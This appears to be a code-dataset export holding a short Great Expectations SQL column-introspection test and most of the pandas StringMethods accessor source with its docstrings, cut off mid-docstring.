| 36.055556 | 81 | 0.747304 | from great_expectations.data_context.util import file_relative_path
from great_expectations.execution_engine import SqlAlchemyExecutionEngine
from great_expectations.execution_engine.sqlalchemy_batch_data import (
SqlAlchemyBatchData,
)
from great_expectations.expectations.metrics.import_manager import reflection
from great_expectations.util import get_sqlalchemy_inspector
def test_table_column_introspection(sa):
db_file = file_relative_path(
__file__,
"../../test_sets/test_cases_for_sql_data_connector.db",
)
eng = sa.create_engine(f"sqlite:///{db_file}")
engine = SqlAlchemyExecutionEngine(engine=eng)
batch_data = SqlAlchemyBatchData(
execution_engine=engine, table_name="table_partitioned_by_date_column__A"
)
engine.load_batch_data("__", batch_data)
assert isinstance(batch_data.selectable, sa.Table)
assert batch_data.selectable.name == "table_partitioned_by_date_column__A"
assert batch_data.selectable.schema is None
insp = get_sqlalchemy_inspector(eng)
columns = insp.get_columns(
batch_data.selectable.name, schema=batch_data.selectable.schema
)
assert [x["name"] for x in columns] == [
"index",
"id",
"date",
"event_type",
"favorite_color",
]
| true | true |
f7fa32076ec862689d2256ecc628e8edb2e78a76 | 102,458 | py | Python | pandas/core/strings/accessor.py | shalarewicz/pandas | 070341cf4958652343f798c74c04a8c15de2fd04 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | pandas/core/strings/accessor.py | shalarewicz/pandas | 070341cf4958652343f798c74c04a8c15de2fd04 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | pandas/core/strings/accessor.py | shalarewicz/pandas | 070341cf4958652343f798c74c04a8c15de2fd04 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | import codecs
from functools import wraps
import re
from typing import (
Dict,
List,
Optional,
)
import warnings
import numpy as np
import pandas._libs.lib as lib
from pandas.util._decorators import Appender
from pandas.core.dtypes.common import (
ensure_object,
is_bool_dtype,
is_categorical_dtype,
is_integer,
is_list_like,
is_re,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCIndex,
ABCMultiIndex,
ABCSeries,
)
from pandas.core.dtypes.missing import isna
from pandas.core.base import NoNewAttributesMixin
_shared_docs: Dict[str, str] = {}
_cpython_optimized_encoders = (
"utf-8",
"utf8",
"latin-1",
"latin1",
"iso-8859-1",
"mbcs",
"ascii",
)
_cpython_optimized_decoders = _cpython_optimized_encoders + ("utf-16", "utf-32")
def forbid_nonstring_types(forbidden, name=None):
"""
Decorator to forbid specific types for a method of StringMethods.
For calling `.str.{method}` on a Series or Index, it is necessary to first
initialize the :class:`StringMethods` object, and then call the method.
However, different methods allow different input types, and so this can not
be checked during :meth:`StringMethods.__init__`, but must be done on a
per-method basis. This decorator exists to facilitate this process, and
make it explicit which (inferred) types are disallowed by the method.
:meth:`StringMethods.__init__` allows the *union* of types its different
methods allow (after skipping NaNs; see :meth:`StringMethods._validate`),
namely: ['string', 'empty', 'bytes', 'mixed', 'mixed-integer'].
The default string types ['string', 'empty'] are allowed for all methods.
For the additional types ['bytes', 'mixed', 'mixed-integer'], each method
then needs to forbid the types it is not intended for.
Parameters
----------
forbidden : list-of-str or None
List of forbidden non-string types, may be one or more of
`['bytes', 'mixed', 'mixed-integer']`.
name : str, default None
Name of the method to use in the error message. By default, this is
None, in which case the name from the method being wrapped will be
copied. However, for working with further wrappers (like _pat_wrapper
and _noarg_wrapper), it is necessary to specify the name.
Returns
-------
func : wrapper
The method to which the decorator is applied, with an added check that
enforces the inferred type to not be in the list of forbidden types.
Raises
------
TypeError
If the inferred type of the underlying data is in `forbidden`.
"""
# deal with None
forbidden = [] if forbidden is None else forbidden
allowed_types = {"string", "empty", "bytes", "mixed", "mixed-integer"} - set(
forbidden
)
def _forbid_nonstring_types(func):
func_name = func.__name__ if name is None else name
@wraps(func)
def wrapper(self, *args, **kwargs):
if self._inferred_dtype not in allowed_types:
msg = (
f"Cannot use .str.{func_name} with values of "
f"inferred dtype '{self._inferred_dtype}'."
)
raise TypeError(msg)
return func(self, *args, **kwargs)
wrapper.__name__ = func_name
return wrapper
return _forbid_nonstring_types
def _map_and_wrap(name, docstring):
@forbid_nonstring_types(["bytes"], name=name)
def wrapper(self):
result = getattr(self._data.array, f"_str_{name}")()
return self._wrap_result(result)
wrapper.__doc__ = docstring
return wrapper
class StringMethods(NoNewAttributesMixin):
"""
Vectorized string functions for Series and Index.
NAs stay NA unless handled otherwise by a particular method.
Patterned after Python's string methods, with some inspiration from
R's stringr package.
Examples
--------
>>> s = pd.Series(["A_Str_Series"])
>>> s
0 A_Str_Series
dtype: object
>>> s.str.split("_")
0 [A, Str, Series]
dtype: object
>>> s.str.replace("_", "")
0 AStrSeries
dtype: object
"""
# Note: see the docstring in pandas.core.strings.__init__
# for an explanation of the implementation.
# TODO: Dispatch all the methods
# Currently the following are not dispatched to the array
# * cat
# * extract
# * extractall
def __init__(self, data):
from pandas.core.arrays.string_ import StringDtype
from pandas.core.arrays.string_arrow import ArrowStringDtype
self._inferred_dtype = self._validate(data)
self._is_categorical = is_categorical_dtype(data.dtype)
self._is_string = isinstance(data.dtype, (StringDtype, ArrowStringDtype))
self._data = data
self._index = self._name = None
if isinstance(data, ABCSeries):
self._index = data.index
self._name = data.name
# ._values.categories works for both Series/Index
self._parent = data._values.categories if self._is_categorical else data
# save orig to blow up categoricals to the right type
self._orig = data
self._freeze()
@staticmethod
def _validate(data):
"""
Auxiliary function for StringMethods, infers and checks dtype of data.
This is a "first line of defence" at the creation of the StringMethods-
object, and just checks that the dtype is in the
*union* of the allowed types over all string methods below; this
restriction is then refined on a per-method basis using the decorator
@forbid_nonstring_types (more info in the corresponding docstring).
This really should exclude all series/index with any non-string values,
but that isn't practical for performance reasons until we have a str
dtype (GH 9343 / 13877)
Parameters
----------
data : The content of the Series
Returns
-------
dtype : inferred dtype of data
"""
if isinstance(data, ABCMultiIndex):
raise AttributeError(
"Can only use .str accessor with Index, not MultiIndex"
)
# see _libs/lib.pyx for list of inferred types
allowed_types = ["string", "empty", "bytes", "mixed", "mixed-integer"]
values = getattr(data, "values", data) # Series / Index
values = getattr(values, "categories", values) # categorical / normal
inferred_dtype = lib.infer_dtype(values, skipna=True)
if inferred_dtype not in allowed_types:
raise AttributeError("Can only use .str accessor with string values!")
return inferred_dtype
def __getitem__(self, key):
result = self._data.array._str_getitem(key)
return self._wrap_result(result)
def __iter__(self):
warnings.warn(
"Columnar iteration over characters will be deprecated in future releases.",
FutureWarning,
stacklevel=2,
)
i = 0
g = self.get(i)
while g.notna().any():
yield g
i += 1
g = self.get(i)
def _wrap_result(
self,
result,
name=None,
expand=None,
fill_value=np.nan,
returns_string=True,
):
from pandas import (
Index,
MultiIndex,
)
if not hasattr(result, "ndim") or not hasattr(result, "dtype"):
if isinstance(result, ABCDataFrame):
result = result.__finalize__(self._orig, name="str")
return result
assert result.ndim < 3
# We can be wrapping a string / object / categorical result, in which
# case we'll want to return the same dtype as the input.
# Or we can be wrapping a numeric output, in which case we don't want
# to return a StringArray.
# Ideally the array method returns the right array type.
if expand is None:
# infer from ndim if expand is not specified
expand = result.ndim != 1
elif expand is True and not isinstance(self._orig, ABCIndex):
# required when expand=True is explicitly specified
# not needed when inferred
def cons_row(x):
if is_list_like(x):
return x
else:
return [x]
result = [cons_row(x) for x in result]
if result:
# propagate nan values to match longest sequence (GH 18450)
max_len = max(len(x) for x in result)
result = [
x * max_len if len(x) == 0 or x[0] is np.nan else x for x in result
]
if not isinstance(expand, bool):
raise ValueError("expand must be True or False")
if expand is False:
# if expand is False, result should have the same name
# as the original otherwise specified
if name is None:
name = getattr(result, "name", None)
if name is None:
# do not use logical or, _orig may be a DataFrame
# which has "name" column
name = self._orig.name
# Wait until we are sure result is a Series or Index before
# checking attributes (GH 12180)
if isinstance(self._orig, ABCIndex):
# if result is a boolean np.array, return the np.array
# instead of wrapping it into a boolean Index (GH 8875)
if is_bool_dtype(result):
return result
if expand:
result = list(result)
out = MultiIndex.from_tuples(result, names=name)
if out.nlevels == 1:
# We had all tuples of length-one, which are
# better represented as a regular Index.
out = out.get_level_values(0)
return out
else:
return Index(result, name=name)
else:
index = self._orig.index
# This is a mess.
dtype: Optional[str]
if self._is_string and returns_string:
dtype = self._orig.dtype
else:
dtype = None
if expand:
cons = self._orig._constructor_expanddim
result = cons(result, columns=name, index=index, dtype=dtype)
else:
# Must be a Series
cons = self._orig._constructor
result = cons(result, name=name, index=index)
result = result.__finalize__(self._orig, method="str")
if name is not None and result.ndim == 1:
# __finalize__ might copy over the original name, but we may
# want the new name (e.g. str.extract).
result.name = name
return result
def _get_series_list(self, others):
"""
Auxiliary function for :meth:`str.cat`. Turn potentially mixed input
into a list of Series (elements without an index must match the length
of the calling Series/Index).
Parameters
----------
others : Series, DataFrame, np.ndarray, list-like or list-like of
Objects that are either Series, Index or np.ndarray (1-dim).
Returns
-------
list of Series
Others transformed into list of Series.
"""
from pandas import (
DataFrame,
Series,
)
# self._orig is either Series or Index
idx = self._orig if isinstance(self._orig, ABCIndex) else self._orig.index
# Generally speaking, all objects without an index inherit the index
# `idx` of the calling Series/Index - i.e. must have matching length.
# Objects with an index (i.e. Series/Index/DataFrame) keep their own.
if isinstance(others, ABCSeries):
return [others]
elif isinstance(others, ABCIndex):
return [Series(others._values, index=idx)]
elif isinstance(others, ABCDataFrame):
return [others[x] for x in others]
elif isinstance(others, np.ndarray) and others.ndim == 2:
others = DataFrame(others, index=idx)
return [others[x] for x in others]
elif is_list_like(others, allow_sets=False):
others = list(others) # ensure iterators do not get read twice etc
# in case of list-like `others`, all elements must be
# either Series/Index/np.ndarray (1-dim)...
if all(
isinstance(x, (ABCSeries, ABCIndex))
or (isinstance(x, np.ndarray) and x.ndim == 1)
for x in others
):
los: List[Series] = []
while others: # iterate through list and append each element
los = los + self._get_series_list(others.pop(0))
return los
# ... or just strings
elif all(not is_list_like(x) for x in others):
return [Series(others, index=idx)]
raise TypeError(
"others must be Series, Index, DataFrame, np.ndarray "
"or list-like (either containing only strings or "
"containing only objects of type Series/Index/"
"np.ndarray[1-dim])"
)
@forbid_nonstring_types(["bytes", "mixed", "mixed-integer"])
def cat(self, others=None, sep=None, na_rep=None, join="left"):
"""
Concatenate strings in the Series/Index with given separator.
If `others` is specified, this function concatenates the Series/Index
and elements of `others` element-wise.
If `others` is not passed, then all values in the Series/Index are
concatenated into a single string with a given `sep`.
Parameters
----------
others : Series, Index, DataFrame, np.ndarray or list-like
Series, Index, DataFrame, np.ndarray (one- or two-dimensional) and
other list-likes of strings must have the same length as the
calling Series/Index, with the exception of indexed objects (i.e.
Series/Index/DataFrame) if `join` is not None.
If others is a list-like that contains a combination of Series,
Index or np.ndarray (1-dim), then all elements will be unpacked and
must satisfy the above criteria individually.
If others is None, the method returns the concatenation of all
strings in the calling Series/Index.
sep : str, default ''
The separator between the different elements/columns. By default
the empty string `''` is used.
na_rep : str or None, default None
Representation that is inserted for all missing values:
- If `na_rep` is None, and `others` is None, missing values in the
Series/Index are omitted from the result.
- If `na_rep` is None, and `others` is not None, a row containing a
missing value in any of the columns (before concatenation) will
have a missing value in the result.
join : {'left', 'right', 'outer', 'inner'}, default 'left'
Determines the join-style between the calling Series/Index and any
Series/Index/DataFrame in `others` (objects without an index need
to match the length of the calling Series/Index). To disable
alignment, use `.values` on any Series/Index/DataFrame in `others`.
.. versionadded:: 0.23.0
.. versionchanged:: 1.0.0
Changed default of `join` from None to `'left'`.
Returns
-------
str, Series or Index
If `others` is None, `str` is returned, otherwise a `Series/Index`
(same type as caller) of objects is returned.
See Also
--------
split : Split each string in the Series/Index.
join : Join lists contained as elements in the Series/Index.
Examples
--------
When not passing `others`, all values are concatenated into a single
string:
>>> s = pd.Series(['a', 'b', np.nan, 'd'])
>>> s.str.cat(sep=' ')
'a b d'
By default, NA values in the Series are ignored. Using `na_rep`, they
can be given a representation:
>>> s.str.cat(sep=' ', na_rep='?')
'a b ? d'
If `others` is specified, corresponding values are concatenated with
the separator. Result will be a Series of strings.
>>> s.str.cat(['A', 'B', 'C', 'D'], sep=',')
0 a,A
1 b,B
2 NaN
3 d,D
dtype: object
Missing values will remain missing in the result, but can again be
represented using `na_rep`
>>> s.str.cat(['A', 'B', 'C', 'D'], sep=',', na_rep='-')
0 a,A
1 b,B
2 -,C
3 d,D
dtype: object
If `sep` is not specified, the values are concatenated without
separation.
>>> s.str.cat(['A', 'B', 'C', 'D'], na_rep='-')
0 aA
1 bB
2 -C
3 dD
dtype: object
Series with different indexes can be aligned before concatenation. The
`join`-keyword works as in other methods.
>>> t = pd.Series(['d', 'a', 'e', 'c'], index=[3, 0, 4, 2])
>>> s.str.cat(t, join='left', na_rep='-')
0 aa
1 b-
2 -c
3 dd
dtype: object
>>>
>>> s.str.cat(t, join='outer', na_rep='-')
0 aa
1 b-
2 -c
3 dd
4 -e
dtype: object
>>>
>>> s.str.cat(t, join='inner', na_rep='-')
0 aa
2 -c
3 dd
dtype: object
>>>
>>> s.str.cat(t, join='right', na_rep='-')
3 dd
0 aa
4 -e
2 -c
dtype: object
For more examples, see :ref:`here <text.concatenate>`.
"""
# TODO: dispatch
from pandas import (
Index,
Series,
concat,
)
if isinstance(others, str):
raise ValueError("Did you mean to supply a `sep` keyword?")
if sep is None:
sep = ""
if isinstance(self._orig, ABCIndex):
data = Series(self._orig, index=self._orig)
else: # Series
data = self._orig
# concatenate Series/Index with itself if no "others"
if others is None:
# error: Incompatible types in assignment (expression has type
# "ndarray", variable has type "Series")
data = ensure_object(data) # type: ignore[assignment]
na_mask = isna(data)
if na_rep is None and na_mask.any():
data = data[~na_mask]
elif na_rep is not None and na_mask.any():
data = np.where(na_mask, na_rep, data)
return sep.join(data)
try:
# turn anything in "others" into lists of Series
others = self._get_series_list(others)
except ValueError as err: # do not catch TypeError raised by _get_series_list
raise ValueError(
"If `others` contains arrays or lists (or other "
"list-likes without an index), these must all be "
"of the same length as the calling Series/Index."
) from err
# align if required
if any(not data.index.equals(x.index) for x in others):
# Need to add keys for uniqueness in case of duplicate columns
others = concat(
others,
axis=1,
join=(join if join == "inner" else "outer"),
keys=range(len(others)),
sort=False,
copy=False,
)
data, others = data.align(others, join=join)
others = [others[x] for x in others] # again list of Series
all_cols = [ensure_object(x) for x in [data] + others]
na_masks = np.array([isna(x) for x in all_cols])
union_mask = np.logical_or.reduce(na_masks, axis=0)
if na_rep is None and union_mask.any():
# no na_rep means NaNs for all rows where any column has a NaN
# only necessary if there are actually any NaNs
result = np.empty(len(data), dtype=object)
np.putmask(result, union_mask, np.nan)
not_masked = ~union_mask
result[not_masked] = cat_safe([x[not_masked] for x in all_cols], sep)
elif na_rep is not None and union_mask.any():
# fill NaNs with na_rep in case there are actually any NaNs
all_cols = [
np.where(nm, na_rep, col) for nm, col in zip(na_masks, all_cols)
]
result = cat_safe(all_cols, sep)
else:
# no NaNs - can just concatenate
result = cat_safe(all_cols, sep)
if isinstance(self._orig, ABCIndex):
# add dtype for case that result is all-NA
# error: Incompatible types in assignment (expression has type
# "Index", variable has type "ndarray")
result = Index( # type: ignore[assignment]
result, dtype=object, name=self._orig.name
)
else: # Series
if is_categorical_dtype(self._orig.dtype):
# We need to infer the new categories.
dtype = None
else:
dtype = self._orig.dtype
# error: Incompatible types in assignment (expression has type
# "Series", variable has type "ndarray")
result = Series( # type: ignore[assignment]
result, dtype=dtype, index=data.index, name=self._orig.name
)
# error: "ndarray" has no attribute "__finalize__"
result = result.__finalize__( # type: ignore[attr-defined]
self._orig, method="str_cat"
)
return result
_shared_docs[
"str_split"
] = r"""
Split strings around given separator/delimiter.
Splits the string in the Series/Index from the %(side)s,
at the specified delimiter string. Equivalent to :meth:`str.%(method)s`.
Parameters
----------
pat : str, optional
String or regular expression to split on.
If not specified, split on whitespace.
n : int, default -1 (all)
Limit number of splits in output.
``None``, 0 and -1 will be interpreted as return all splits.
expand : bool, default False
Expand the split strings into separate columns.
* If ``True``, return DataFrame/MultiIndex expanding dimensionality.
* If ``False``, return Series/Index, containing lists of strings.
Returns
-------
Series, Index, DataFrame or MultiIndex
Type matches caller unless ``expand=True`` (see Notes).
See Also
--------
Series.str.split : Split strings around given separator/delimiter.
Series.str.rsplit : Splits string around given separator/delimiter,
starting from the right.
Series.str.join : Join lists contained as elements in the Series/Index
with passed delimiter.
str.split : Standard library version for split.
str.rsplit : Standard library version for rsplit.
Notes
-----
The handling of the `n` keyword depends on the number of found splits:
- If found splits > `n`, make first `n` splits only
- If found splits <= `n`, make all splits
- If for a certain row the number of found splits < `n`,
append `None` for padding up to `n` if ``expand=True``
If using ``expand=True``, Series and Index callers return DataFrame and
MultiIndex objects, respectively.
Examples
--------
>>> s = pd.Series(
... [
... "this is a regular sentence",
... "https://docs.python.org/3/tutorial/index.html",
... np.nan
... ]
... )
>>> s
0 this is a regular sentence
1 https://docs.python.org/3/tutorial/index.html
2 NaN
dtype: object
In the default setting, the string is split by whitespace.
>>> s.str.split()
0 [this, is, a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
Without the `n` parameter, the outputs of `rsplit` and `split`
are identical.
>>> s.str.rsplit()
0 [this, is, a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
The `n` parameter can be used to limit the number of splits on the
delimiter. The outputs of `split` and `rsplit` are different.
>>> s.str.split(n=2)
0 [this, is, a regular sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
>>> s.str.rsplit(n=2)
0 [this is a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
The `pat` parameter can be used to split by other characters.
>>> s.str.split(pat="/")
0 [this is a regular sentence]
1 [https:, , docs.python.org, 3, tutorial, index...
2 NaN
dtype: object
When using ``expand=True``, the split elements will expand out into
separate columns. If NaN is present, it is propagated throughout
the columns during the split.
>>> s.str.split(expand=True)
0 1 2 3 4
0 this is a regular sentence
1 https://docs.python.org/3/tutorial/index.html None None None None
2 NaN NaN NaN NaN NaN
For slightly more complex use cases like splitting the html document name
from a url, a combination of parameter settings can be used.
>>> s.str.rsplit("/", n=1, expand=True)
0 1
0 this is a regular sentence None
1 https://docs.python.org/3/tutorial index.html
2 NaN NaN
Remember to escape special characters when explicitly using regular
expressions.
>>> s = pd.Series(["1+1=2"])
>>> s
0 1+1=2
dtype: object
>>> s.str.split(r"\+|=", expand=True)
0 1 2
0 1 1 2
"""
@Appender(_shared_docs["str_split"] % {"side": "beginning", "method": "split"})
@forbid_nonstring_types(["bytes"])
def split(self, pat=None, n=-1, expand=False):
result = self._data.array._str_split(pat, n, expand)
return self._wrap_result(result, returns_string=expand, expand=expand)
@Appender(_shared_docs["str_split"] % {"side": "end", "method": "rsplit"})
@forbid_nonstring_types(["bytes"])
def rsplit(self, pat=None, n=-1, expand=False):
result = self._data.array._str_rsplit(pat, n=n)
return self._wrap_result(result, expand=expand, returns_string=expand)
_shared_docs[
"str_partition"
] = """
Split the string at the %(side)s occurrence of `sep`.
This method splits the string at the %(side)s occurrence of `sep`,
and returns 3 elements containing the part before the separator,
the separator itself, and the part after the separator.
If the separator is not found, return %(return)s.
Parameters
----------
sep : str, default whitespace
String to split on.
expand : bool, default True
If True, return DataFrame/MultiIndex expanding dimensionality.
If False, return Series/Index.
Returns
-------
DataFrame/MultiIndex or Series/Index of objects
See Also
--------
%(also)s
Series.str.split : Split strings around given separators.
str.partition : Standard library version.
Examples
--------
>>> s = pd.Series(['Linda van der Berg', 'George Pitt-Rivers'])
>>> s
0 Linda van der Berg
1 George Pitt-Rivers
dtype: object
>>> s.str.partition()
0 1 2
0 Linda van der Berg
1 George Pitt-Rivers
To partition by the last space instead of the first one:
>>> s.str.rpartition()
0 1 2
0 Linda van der Berg
1 George Pitt-Rivers
To partition by something different than a space:
>>> s.str.partition('-')
0 1 2
0 Linda van der Berg
1 George Pitt - Rivers
To return a Series containing tuples instead of a DataFrame:
>>> s.str.partition('-', expand=False)
0 (Linda van der Berg, , )
1 (George Pitt, -, Rivers)
dtype: object
Also available on indices:
>>> idx = pd.Index(['X 123', 'Y 999'])
>>> idx
Index(['X 123', 'Y 999'], dtype='object')
Which will create a MultiIndex:
>>> idx.str.partition()
MultiIndex([('X', ' ', '123'),
('Y', ' ', '999')],
)
Or an index with tuples with ``expand=False``:
>>> idx.str.partition(expand=False)
Index([('X', ' ', '123'), ('Y', ' ', '999')], dtype='object')
"""
@Appender(
_shared_docs["str_partition"]
% {
"side": "first",
"return": "3 elements containing the string itself, followed by two "
"empty strings",
"also": "rpartition : Split the string at the last occurrence of `sep`.",
}
)
@forbid_nonstring_types(["bytes"])
def partition(self, sep=" ", expand=True):
result = self._data.array._str_partition(sep, expand)
return self._wrap_result(result, expand=expand, returns_string=expand)
@Appender(
_shared_docs["str_partition"]
% {
"side": "last",
"return": "3 elements containing two empty strings, followed by the "
"string itself",
"also": "partition : Split the string at the first occurrence of `sep`.",
}
)
@forbid_nonstring_types(["bytes"])
def rpartition(self, sep=" ", expand=True):
result = self._data.array._str_rpartition(sep, expand)
return self._wrap_result(result, expand=expand, returns_string=expand)
def get(self, i):
"""
Extract element from each component at specified position.
Extract element from lists, tuples, or strings in each element in the
Series/Index.
Parameters
----------
i : int
Position of element to extract.
Returns
-------
Series or Index
Examples
--------
>>> s = pd.Series(["String",
... (1, 2, 3),
... ["a", "b", "c"],
... 123,
... -456,
... {1: "Hello", "2": "World"}])
>>> s
0 String
1 (1, 2, 3)
2 [a, b, c]
3 123
4 -456
5 {1: 'Hello', '2': 'World'}
dtype: object
>>> s.str.get(1)
0 t
1 2
2 b
3 NaN
4 NaN
5 Hello
dtype: object
>>> s.str.get(-1)
0 g
1 3
2 c
3 NaN
4 NaN
5 None
dtype: object
"""
result = self._data.array._str_get(i)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def join(self, sep):
"""
Join lists contained as elements in the Series/Index with passed delimiter.
If the elements of a Series are lists themselves, join the content of these
lists using the delimiter passed to the function.
This function is an equivalent to :meth:`str.join`.
Parameters
----------
sep : str
Delimiter to use between list entries.
Returns
-------
Series/Index: object
The list entries concatenated by intervening occurrences of the
delimiter.
Raises
------
AttributeError
If the supplied Series contains neither strings nor lists.
See Also
--------
str.join : Standard library version of this method.
Series.str.split : Split strings around given separator/delimiter.
Notes
-----
If any of the list items is not a string object, the result of the join
will be `NaN`.
Examples
--------
Example with a list that contains non-string elements.
>>> s = pd.Series([['lion', 'elephant', 'zebra'],
... [1.1, 2.2, 3.3],
... ['cat', np.nan, 'dog'],
... ['cow', 4.5, 'goat'],
... ['duck', ['swan', 'fish'], 'guppy']])
>>> s
0 [lion, elephant, zebra]
1 [1.1, 2.2, 3.3]
2 [cat, nan, dog]
3 [cow, 4.5, goat]
4 [duck, [swan, fish], guppy]
dtype: object
Join all lists using a '-'. The lists containing object(s) of types other
than str will produce a NaN.
>>> s.str.join('-')
0 lion-elephant-zebra
1 NaN
2 NaN
3 NaN
4 NaN
dtype: object
"""
result = self._data.array._str_join(sep)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def contains(self, pat, case=True, flags=0, na=None, regex=True):
r"""
Test if pattern or regex is contained within a string of a Series or Index.
Return boolean Series or Index based on whether a given pattern or regex is
contained within a string of a Series or Index.
Parameters
----------
pat : str
Character sequence or regular expression.
case : bool, default True
If True, case sensitive.
flags : int, default 0 (no flags)
Flags to pass through to the re module, e.g. re.IGNORECASE.
na : scalar, optional
Fill value for missing values. The default depends on dtype of the
array. For object-dtype, ``numpy.nan`` is used. For ``StringDtype``,
``pandas.NA`` is used.
regex : bool, default True
If True, assumes the pat is a regular expression.
If False, treats the pat as a literal string.
Returns
-------
Series or Index of boolean values
A Series or Index of boolean values indicating whether the
given pattern is contained within the string of each element
of the Series or Index.
See Also
--------
match : Analogous, but stricter, relying on re.match instead of re.search.
Series.str.startswith : Test if the start of each string element matches a
pattern.
Series.str.endswith : Same as startswith, but tests the end of string.
Examples
--------
Returning a Series of booleans using only a literal pattern.
>>> s1 = pd.Series(['Mouse', 'dog', 'house and parrot', '23', np.NaN])
>>> s1.str.contains('og', regex=False)
0 False
1 True
2 False
3 False
4 NaN
dtype: object
Returning an Index of booleans using only a literal pattern.
>>> ind = pd.Index(['Mouse', 'dog', 'house and parrot', '23.0', np.NaN])
>>> ind.str.contains('23', regex=False)
Index([False, False, False, True, nan], dtype='object')
Specifying case sensitivity using `case`.
>>> s1.str.contains('oG', case=True, regex=True)
0 False
1 False
2 False
3 False
4 NaN
dtype: object
Specifying `na` to be `False` instead of `NaN` replaces NaN values
with `False`. If Series or Index does not contain NaN values
the resultant dtype will be `bool`, otherwise, an `object` dtype.
>>> s1.str.contains('og', na=False, regex=True)
0 False
1 True
2 False
3 False
4 False
dtype: bool
Returning 'house' or 'dog' when either expression occurs in a string.
>>> s1.str.contains('house|dog', regex=True)
0 False
1 True
2 True
3 False
4 NaN
dtype: object
Ignoring case sensitivity using `flags` with regex.
>>> import re
>>> s1.str.contains('PARROT', flags=re.IGNORECASE, regex=True)
0 False
1 False
2 True
3 False
4 NaN
dtype: object
Returning any digit using regular expression.
>>> s1.str.contains('\\d', regex=True)
0 False
1 False
2 False
3 True
4 NaN
dtype: object
Ensure `pat` is a not a literal pattern when `regex` is set to True.
Note in the following example one might expect only `s2[1]` and `s2[3]` to
return `True`. However, '.0' as a regex matches any character
followed by a 0.
>>> s2 = pd.Series(['40', '40.0', '41', '41.0', '35'])
>>> s2.str.contains('.0', regex=True)
0 True
1 True
2 False
3 True
4 False
dtype: bool
"""
if regex and re.compile(pat).groups:
warnings.warn(
"This pattern has match groups. To actually get the "
"groups, use str.extract.",
UserWarning,
stacklevel=3,
)
result = self._data.array._str_contains(pat, case, flags, na, regex)
return self._wrap_result(result, fill_value=na, returns_string=False)
@forbid_nonstring_types(["bytes"])
def match(self, pat, case=True, flags=0, na=None):
"""
Determine if each string starts with a match of a regular expression.
Parameters
----------
pat : str
Character sequence or regular expression.
case : bool, default True
If True, case sensitive.
flags : int, default 0 (no flags)
Regex module flags, e.g. re.IGNORECASE.
na : scalar, optional
Fill value for missing values. The default depends on dtype of the
array. For object-dtype, ``numpy.nan`` is used. For ``StringDtype``,
``pandas.NA`` is used.
Returns
-------
Series/array of boolean values
See Also
--------
fullmatch : Stricter matching that requires the entire string to match.
contains : Analogous, but less strict, relying on re.search instead of
re.match.
extract : Extract matched groups.
"""
result = self._data.array._str_match(pat, case=case, flags=flags, na=na)
return self._wrap_result(result, fill_value=na, returns_string=False)
@forbid_nonstring_types(["bytes"])
def fullmatch(self, pat, case=True, flags=0, na=None):
"""
Determine if each string entirely matches a regular expression.
.. versionadded:: 1.1.0
Parameters
----------
pat : str
Character sequence or regular expression.
case : bool, default True
If True, case sensitive.
flags : int, default 0 (no flags)
Regex module flags, e.g. re.IGNORECASE.
na : scalar, optional.
Fill value for missing values. The default depends on dtype of the
array. For object-dtype, ``numpy.nan`` is used. For ``StringDtype``,
``pandas.NA`` is used.
Returns
-------
Series/array of boolean values
See Also
--------
match : Similar, but also returns `True` when only a *prefix* of the string
matches the regular expression.
extract : Extract matched groups.
"""
result = self._data.array._str_fullmatch(pat, case=case, flags=flags, na=na)
return self._wrap_result(result, fill_value=na, returns_string=False)
@forbid_nonstring_types(["bytes"])
def replace(self, pat, repl, n=-1, case=None, flags=0, regex=None):
r"""
Replace each occurrence of pattern/regex in the Series/Index.
Equivalent to :meth:`str.replace` or :func:`re.sub`, depending on
the regex value.
Parameters
----------
pat : str or compiled regex
String can be a character sequence or regular expression.
repl : str or callable
Replacement string or a callable. The callable is passed the regex
match object and must return a replacement string to be used.
See :func:`re.sub`.
n : int, default -1 (all)
Number of replacements to make from start.
case : bool, default None
Determines if replace is case sensitive:
- If True, case sensitive (the default if `pat` is a string)
- Set to False for case insensitive
- Cannot be set if `pat` is a compiled regex.
flags : int, default 0 (no flags)
Regex module flags, e.g. re.IGNORECASE. Cannot be set if `pat` is a compiled
regex.
regex : bool, default True
Determines if assumes the passed-in pattern is a regular expression:
- If True, assumes the passed-in pattern is a regular expression.
- If False, treats the pattern as a literal string
- Cannot be set to False if `pat` is a compiled regex or `repl` is
a callable.
.. versionadded:: 0.23.0
Returns
-------
Series or Index of object
A copy of the object with all matching occurrences of `pat` replaced by
`repl`.
Raises
------
ValueError
* if `regex` is False and `repl` is a callable or `pat` is a compiled
regex
* if `pat` is a compiled regex and `case` or `flags` is set
Notes
-----
When `pat` is a compiled regex, all flags should be included in the
compiled regex. Use of `case`, `flags`, or `regex=False` with a compiled
regex will raise an error.
Examples
--------
When `pat` is a string and `regex` is True (the default), the given `pat`
is compiled as a regex. When `repl` is a string, it replaces matching
regex patterns as with :meth:`re.sub`. NaN value(s) in the Series are
left as is:
>>> pd.Series(['foo', 'fuz', np.nan]).str.replace('f.', 'ba', regex=True)
0 bao
1 baz
2 NaN
dtype: object
When `pat` is a string and `regex` is False, every `pat` is replaced with
`repl` as with :meth:`str.replace`:
>>> pd.Series(['f.o', 'fuz', np.nan]).str.replace('f.', 'ba', regex=False)
0 bao
1 fuz
2 NaN
dtype: object
When `repl` is a callable, it is called on every `pat` using
:func:`re.sub`. The callable should expect one positional argument
(a regex object) and return a string.
To get the idea:
>>> pd.Series(['foo', 'fuz', np.nan]).str.replace('f', repr)
0 <re.Match object; span=(0, 1), match='f'>oo
1 <re.Match object; span=(0, 1), match='f'>uz
2 NaN
dtype: object
Reverse every lowercase alphabetic word:
